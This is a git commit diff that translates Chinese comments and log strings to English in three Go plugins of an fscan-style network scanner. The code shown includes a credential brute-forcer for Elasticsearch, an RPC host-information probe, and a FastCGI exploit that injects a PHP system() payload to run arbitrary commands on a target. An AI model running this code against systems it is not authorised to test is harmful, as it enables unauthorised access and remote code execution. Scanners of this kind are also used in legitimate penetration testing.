Translate 3 file from Plugins

Translate Chinese text to English in the `Plugins` folder files.

* **Plugins/Elasticsearch.go**
  - Translate log messages and comments from Chinese to English.
  - Update variable names and error messages to English.

* **Plugins/FcgiScan.go**
  - Translate comments and log messages from Chinese to English.
  - Update error messages and result strings to English.

* **Plugins/FindNet.go**
  - Translate comments and error messages from Chinese to English.
  - Update log messages and result strings to English.

---

For more details, open the [Copilot Workspace session](https://copilot-workspace.githubnext.com/redhawkeye/fscan?shareId=XXXX-XXXX-XXXX-XXXX).
This commit is contained in:
Budi Komarudin 2025-03-19 19:38:41 +07:00
parent bc8c5648f3
commit 5d20cc05c3
3 changed files with 62 additions and 62 deletions

View File

@ -18,20 +18,20 @@ func ElasticScan(info *Common.HostInfo) (tmperr error) {
maxRetries := Common.MaxRetries maxRetries := Common.MaxRetries
target := fmt.Sprintf("%v:%v", info.Host, info.Ports) target := fmt.Sprintf("%v:%v", info.Host, info.Ports)
Common.LogDebug(fmt.Sprintf("开始扫描 %s", target)) Common.LogDebug(fmt.Sprintf("Starting scan %s", target))
Common.LogDebug("尝试无认证访问...") Common.LogDebug("Trying unauthenticated access...")
// 首先测试无认证访问 // First test unauthenticated access
for retryCount := 0; retryCount < maxRetries; retryCount++ { for retryCount := 0; retryCount < maxRetries; retryCount++ {
if retryCount > 0 { if retryCount > 0 {
Common.LogDebug(fmt.Sprintf("第%d次重试无认证访问", retryCount+1)) Common.LogDebug(fmt.Sprintf("Retrying unauthenticated access for the %d time", retryCount+1))
} }
flag, err := ElasticConn(info, "", "") flag, err := ElasticConn(info, "", "")
if flag && err == nil { if flag && err == nil {
successMsg := fmt.Sprintf("Elasticsearch服务 %s 无需认证", target) successMsg := fmt.Sprintf("Elasticsearch service %s does not require authentication", target)
Common.LogSuccess(successMsg) Common.LogSuccess(successMsg)
// 保存无认证访问结果 // Save unauthenticated access result
result := &Common.ScanResult{ result := &Common.ScanResult{
Time: time.Now(), Time: time.Now(),
Type: Common.VULN, Type: Common.VULN,
@ -57,23 +57,23 @@ func ElasticScan(info *Common.HostInfo) (tmperr error) {
totalUsers := len(Common.Userdict["elastic"]) totalUsers := len(Common.Userdict["elastic"])
totalPass := len(Common.Passwords) totalPass := len(Common.Passwords)
Common.LogDebug(fmt.Sprintf("开始尝试用户名密码组合 (总用户数: %d, 总密码数: %d)", Common.LogDebug(fmt.Sprintf("Starting to try username and password combinations (Total users: %d, Total passwords: %d)",
totalUsers, totalPass)) totalUsers, totalPass))
tried := 0 tried := 0
total := totalUsers * totalPass total := totalUsers * totalPass
// 遍历所有用户名密码组合 // Iterate over all username and password combinations
for _, user := range Common.Userdict["elastic"] { for _, user := range Common.Userdict["elastic"] {
for _, pass := range Common.Passwords { for _, pass := range Common.Passwords {
tried++ tried++
pass = strings.Replace(pass, "{user}", user, -1) pass = strings.Replace(pass, "{user}", user, -1)
Common.LogDebug(fmt.Sprintf("[%d/%d] 尝试: %s:%s", tried, total, user, pass)) Common.LogDebug(fmt.Sprintf("[%d/%d] Trying: %s:%s", tried, total, user, pass))
// 重试循环 // Retry loop
for retryCount := 0; retryCount < maxRetries; retryCount++ { for retryCount := 0; retryCount < maxRetries; retryCount++ {
if retryCount > 0 { if retryCount > 0 {
Common.LogDebug(fmt.Sprintf("第%d次重试: %s:%s", retryCount+1, user, pass)) Common.LogDebug(fmt.Sprintf("Retrying for the %d time: %s:%s", retryCount+1, user, pass))
} }
done := make(chan struct { done := make(chan struct {
@ -97,11 +97,11 @@ func ElasticScan(info *Common.HostInfo) (tmperr error) {
case result := <-done: case result := <-done:
err = result.err err = result.err
if result.success && err == nil { if result.success && err == nil {
successMsg := fmt.Sprintf("Elasticsearch服务 %s 爆破成功 用户名: %v 密码: %v", successMsg := fmt.Sprintf("Elasticsearch service %s brute force successful Username: %v Password: %v",
target, user, pass) target, user, pass)
Common.LogSuccess(successMsg) Common.LogSuccess(successMsg)
// 保存弱密码结果 // Save weak password result
vulnResult := &Common.ScanResult{ vulnResult := &Common.ScanResult{
Time: time.Now(), Time: time.Now(),
Type: Common.VULN, Type: Common.VULN,
@ -119,11 +119,11 @@ func ElasticScan(info *Common.HostInfo) (tmperr error) {
return nil return nil
} }
case <-time.After(time.Duration(Common.Timeout) * time.Second): case <-time.After(time.Duration(Common.Timeout) * time.Second):
err = fmt.Errorf("连接超时") err = fmt.Errorf("connection timeout")
} }
if err != nil { if err != nil {
errlog := fmt.Sprintf("Elasticsearch服务 %s 尝试失败 用户名: %v 密码: %v 错误: %v", errlog := fmt.Sprintf("Elasticsearch service %s attempt failed Username: %v Password: %v Error: %v",
target, user, pass, err) target, user, pass, err)
Common.LogError(errlog) Common.LogError(errlog)
@ -139,11 +139,11 @@ func ElasticScan(info *Common.HostInfo) (tmperr error) {
} }
} }
Common.LogDebug(fmt.Sprintf("扫描完成,共尝试 %d 个组合", tried)) Common.LogDebug(fmt.Sprintf("Scan completed, tried %d combinations", tried))
return tmperr return tmperr
} }
// ElasticConn 尝试 Elasticsearch 连接 // ElasticConn attempts to connect to Elasticsearch
func ElasticConn(info *Common.HostInfo, user string, pass string) (bool, error) { func ElasticConn(info *Common.HostInfo, user string, pass string) (bool, error) {
host, port := info.Host, info.Ports host, port := info.Host, info.Ports
timeout := time.Duration(Common.Timeout) * time.Second timeout := time.Duration(Common.Timeout) * time.Second

View File

@ -18,34 +18,34 @@ import (
//https://xz.aliyun.com/t/9544 //https://xz.aliyun.com/t/9544
//https://github.com/wofeiwo/webcgi-exploits //https://github.com/wofeiwo/webcgi-exploits
// FcgiScan 执行FastCGI服务器漏洞扫描 // FcgiScan performs a FastCGI server vulnerability scan
func FcgiScan(info *Common.HostInfo) error { func FcgiScan(info *Common.HostInfo) error {
// 如果设置了暴力破解模式则跳过 // Skip if brute force mode is set
if Common.DisableBrute { if Common.DisableBrute {
return nil return nil
} }
// 设置目标URL路径 // Set target URL path
url := "/etc/issue" url := "/etc/issue"
if Common.RemotePath != "" { if Common.RemotePath != "" {
url = Common.RemotePath url = Common.RemotePath
} }
addr := fmt.Sprintf("%v:%v", info.Host, info.Ports) addr := fmt.Sprintf("%v:%v", info.Host, info.Ports)
// 构造PHP命令注入代码 // Construct PHP command injection code
var reqParams string var reqParams string
var cutLine = "-----ASDGTasdkk361363s-----\n" // 用于分割命令输出的标记 var cutLine = "-----ASDGTasdkk361363s-----\n" // Marker for separating command output
switch { switch {
case Common.Command == "read": case Common.Command == "read":
reqParams = "" // 读取模式 reqParams = "" // Read mode
case Common.Command != "": case Common.Command != "":
reqParams = fmt.Sprintf("<?php system('%s');die('%s');?>", Common.Command, cutLine) // 自定义命令 reqParams = fmt.Sprintf("<?php system('%s');die('%s');?>", Common.Command, cutLine) // Custom command
default: default:
reqParams = fmt.Sprintf("<?php system('whoami');die('%s');?>", cutLine) // 默认执行whoami reqParams = fmt.Sprintf("<?php system('whoami');die('%s');?>", cutLine) // Default to whoami
} }
// 设置FastCGI环境变量 // Set FastCGI environment variables
env := map[string]string{ env := map[string]string{
"SCRIPT_FILENAME": url, "SCRIPT_FILENAME": url,
"DOCUMENT_ROOT": "/", "DOCUMENT_ROOT": "/",
@ -54,7 +54,7 @@ func FcgiScan(info *Common.HostInfo) error {
"SERVER_PROTOCOL": "HTTP/1.1", "SERVER_PROTOCOL": "HTTP/1.1",
} }
// 根据请求类型设置对应的环境变量 // Set corresponding environment variables based on request type
if len(reqParams) != 0 { if len(reqParams) != 0 {
env["CONTENT_LENGTH"] = strconv.Itoa(len(reqParams)) env["CONTENT_LENGTH"] = strconv.Itoa(len(reqParams))
env["REQUEST_METHOD"] = "POST" env["REQUEST_METHOD"] = "POST"
@ -63,7 +63,7 @@ func FcgiScan(info *Common.HostInfo) error {
env["REQUEST_METHOD"] = "GET" env["REQUEST_METHOD"] = "GET"
} }
// 建立FastCGI连接 // Establish FastCGI connection
fcgi, err := New(addr, Common.Timeout) fcgi, err := New(addr, Common.Timeout)
defer func() { defer func() {
if fcgi.rwc != nil { if fcgi.rwc != nil {
@ -71,41 +71,41 @@ func FcgiScan(info *Common.HostInfo) error {
} }
}() }()
if err != nil { if err != nil {
fmt.Printf("FastCGI连接失败 %v:%v - %v\n", info.Host, info.Ports, err) fmt.Printf("FastCGI connection failed %v:%v - %v\n", info.Host, info.Ports, err)
return err return err
} }
// 发送FastCGI请求 // Send FastCGI request
stdout, stderr, err := fcgi.Request(env, reqParams) stdout, stderr, err := fcgi.Request(env, reqParams)
if err != nil { if err != nil {
fmt.Printf("FastCGI请求失败 %v:%v - %v\n", info.Host, info.Ports, err) fmt.Printf("FastCGI request failed %v:%v - %v\n", info.Host, info.Ports, err)
return err return err
} }
// 处理响应结果 // Process response result
output := string(stdout) output := string(stdout)
var result string var result string
if strings.Contains(output, cutLine) { if strings.Contains(output, cutLine) {
// 命令执行成功,提取输出结果 // Command executed successfully, extract output result
output = strings.SplitN(output, cutLine, 2)[0] output = strings.SplitN(output, cutLine, 2)[0]
if len(stderr) > 0 { if len(stderr) > 0 {
result = fmt.Sprintf("FastCGI漏洞确认 %v:%v\n命令输出:\n%v\n错误信息:\n%v\n建议尝试其他路径例如: -path /www/wwwroot/index.php", result = fmt.Sprintf("FastCGI vulnerability confirmed %v:%v\nCommand output:\n%v\nError message:\n%v\nSuggest trying other paths, e.g., -path /www/wwwroot/index.php",
info.Host, info.Ports, output, string(stderr)) info.Host, info.Ports, output, string(stderr))
} else { } else {
result = fmt.Sprintf("FastCGI漏洞确认 %v:%v\n命令输出:\n%v", result = fmt.Sprintf("FastCGI vulnerability confirmed %v:%v\nCommand output:\n%v",
info.Host, info.Ports, output) info.Host, info.Ports, output)
} }
Common.LogSuccess(result) Common.LogSuccess(result)
} else if strings.Contains(output, "File not found") || } else if strings.Contains(output, "File not found") ||
strings.Contains(output, "Content-type") || strings.Contains(output, "Content-type") ||
strings.Contains(output, "Status") { strings.Contains(output, "Status") {
// 目标存在FastCGI服务但可能路径错误 // Target has FastCGI service but possibly incorrect path
if len(stderr) > 0 { if len(stderr) > 0 {
result = fmt.Sprintf("FastCGI服务确认 %v:%v\n响应:\n%v\n错误信息:\n%v\n建议尝试其他路径例如: -path /www/wwwroot/index.php", result = fmt.Sprintf("FastCGI service confirmed %v:%v\nResponse:\n%v\nError message:\n%v\nSuggest trying other paths, e.g., -path /www/wwwroot/index.php",
info.Host, info.Ports, output, string(stderr)) info.Host, info.Ports, output, string(stderr))
} else { } else {
result = fmt.Sprintf("FastCGI服务确认 %v:%v\n响应:\n%v", result = fmt.Sprintf("FastCGI service confirmed %v:%v\nResponse:\n%v",
info.Host, info.Ports, output) info.Host, info.Ports, output)
} }
Common.LogSuccess(result) Common.LogSuccess(result)

View File

@ -27,30 +27,30 @@ func FindnetScan(info *Common.HostInfo) error {
target := fmt.Sprintf("%s:%v", info.Host, 135) target := fmt.Sprintf("%s:%v", info.Host, 135)
conn, err := Common.WrapperTcpWithTimeout("tcp", target, time.Duration(Common.Timeout)*time.Second) conn, err := Common.WrapperTcpWithTimeout("tcp", target, time.Duration(Common.Timeout)*time.Second)
if err != nil { if err != nil {
return fmt.Errorf("连接RPC端口失败: %v", err) return fmt.Errorf("Failed to connect to RPC port: %v", err)
} }
defer conn.Close() defer conn.Close()
if err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second)); err != nil { if err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second)); err != nil {
return fmt.Errorf("设置超时失败: %v", err) return fmt.Errorf("Failed to set timeout: %v", err)
} }
if _, err = conn.Write(bufferV1); err != nil { if _, err = conn.Write(bufferV1); err != nil {
return fmt.Errorf("发送RPC请求1失败: %v", err) return fmt.Errorf("Failed to send RPC request 1: %v", err)
} }
reply := make([]byte, 4096) reply := make([]byte, 4096)
if _, err = conn.Read(reply); err != nil { if _, err = conn.Read(reply); err != nil {
return fmt.Errorf("读取RPC响应1失败: %v", err) return fmt.Errorf("Failed to read RPC response 1: %v", err)
} }
if _, err = conn.Write(bufferV2); err != nil { if _, err = conn.Write(bufferV2); err != nil {
return fmt.Errorf("发送RPC请求2失败: %v", err) return fmt.Errorf("Failed to send RPC request 2: %v", err)
} }
n, err := conn.Read(reply) n, err := conn.Read(reply)
if err != nil || n < 42 { if err != nil || n < 42 {
return fmt.Errorf("读取RPC响应2失败: %v", err) return fmt.Errorf("Failed to read RPC response 2: %v", err)
} }
text := reply[42:] text := reply[42:]
@ -64,7 +64,7 @@ func FindnetScan(info *Common.HostInfo) error {
} }
if !found { if !found {
return fmt.Errorf("未找到有效的响应标记") return fmt.Errorf("No valid response marker found")
} }
return read(text, info.Host) return read(text, info.Host)
@ -104,17 +104,17 @@ func isValidHostname(name string) bool {
} }
func isValidNetworkAddress(addr string) bool { func isValidNetworkAddress(addr string) bool {
// 检查是否为IPv4或IPv6 // Check if it's an IPv4 or IPv6 address
if ip := net.ParseIP(addr); ip != nil { if ip := net.ParseIP(addr); ip != nil {
return true return true
} }
// 检查是否为有效主机名 // Check if it's a valid hostname
return isValidHostname(addr) return isValidHostname(addr)
} }
func cleanAndValidateAddress(data []byte) string { func cleanAndValidateAddress(data []byte) string {
// 转换为字符串并清理不可打印字符 // Convert to string and clean non-printable characters
addr := strings.Map(func(r rune) rune { addr := strings.Map(func(r rune) rune {
if unicode.IsPrint(r) { if unicode.IsPrint(r) {
return r return r
@ -122,7 +122,7 @@ func cleanAndValidateAddress(data []byte) string {
return -1 return -1
}, string(data)) }, string(data))
// 移除前后空白 // Trim leading and trailing whitespace
addr = strings.TrimSpace(addr) addr = strings.TrimSpace(addr)
if isValidNetworkAddress(addr) { if isValidNetworkAddress(addr) {
@ -134,7 +134,7 @@ func cleanAndValidateAddress(data []byte) string {
func read(text []byte, host string) error { func read(text []byte, host string) error {
encodedStr := hex.EncodeToString(text) encodedStr := hex.EncodeToString(text)
// 解析主机名 // Parse hostname
var hostName string var hostName string
for i := 0; i < len(encodedStr)-4; i += 4 { for i := 0; i < len(encodedStr)-4; i += 4 {
if encodedStr[i:i+4] == "0000" { if encodedStr[i:i+4] == "0000" {
@ -148,16 +148,16 @@ func read(text []byte, host string) error {
name = "" name = ""
} }
// 用于收集地址信息 // Collect address information
var ipv4Addrs []string var ipv4Addrs []string
var ipv6Addrs []string var ipv6Addrs []string
seenAddresses := make(map[string]bool) seenAddresses := make(map[string]bool)
// 解析网络信息 // Parse network information
netInfo := strings.Replace(encodedStr, "0700", "", -1) netInfo := strings.Replace(encodedStr, "0700", "", -1)
segments := strings.Split(netInfo, "000000") segments := strings.Split(netInfo, "000000")
// 处理每个网络地址 // Process each network address
for _, segment := range segments { for _, segment := range segments {
if len(segment) == 0 { if len(segment) == 0 {
continue continue
@ -184,14 +184,14 @@ func read(text []byte, host string) error {
} }
} }
// 构建详细信息 // Build details
details := map[string]interface{}{ details := map[string]interface{}{
"hostname": name, "hostname": name,
"ipv4": ipv4Addrs, "ipv4": ipv4Addrs,
"ipv6": ipv6Addrs, "ipv6": ipv6Addrs,
} }
// 保存扫描结果 // Save scan result
result := &Common.ScanResult{ result := &Common.ScanResult{
Time: time.Now(), Time: time.Now(),
Type: Common.SERVICE, Type: Common.SERVICE,
@ -201,24 +201,24 @@ func read(text []byte, host string) error {
} }
Common.SaveResult(result) Common.SaveResult(result)
// 构建控制台输出 // Build console output
var output strings.Builder var output strings.Builder
output.WriteString("NetInfo 扫描结果") output.WriteString("NetInfo Scan Result")
output.WriteString(fmt.Sprintf("\n目标主机: %s", host)) output.WriteString(fmt.Sprintf("\nTarget Host: %s", host))
if name != "" { if name != "" {
output.WriteString(fmt.Sprintf("\n主机名: %s", name)) output.WriteString(fmt.Sprintf("\nHostname: %s", name))
} }
output.WriteString("\n发现的网络接口:") output.WriteString("\nDiscovered Network Interfaces:")
if len(ipv4Addrs) > 0 { if len(ipv4Addrs) > 0 {
output.WriteString("\n IPv4地址:") output.WriteString("\n IPv4 Addresses:")
for _, addr := range ipv4Addrs { for _, addr := range ipv4Addrs {
output.WriteString(fmt.Sprintf("\n └─ %s", addr)) output.WriteString(fmt.Sprintf("\n └─ %s", addr))
} }
} }
if len(ipv6Addrs) > 0 { if len(ipv6Addrs) > 0 {
output.WriteString("\n IPv6地址:") output.WriteString("\n IPv6 Addresses:")
for _, addr := range ipv6Addrs { for _, addr := range ipv6Addrs {
output.WriteString(fmt.Sprintf("\n └─ %s", addr)) output.WriteString(fmt.Sprintf("\n └─ %s", addr))
} }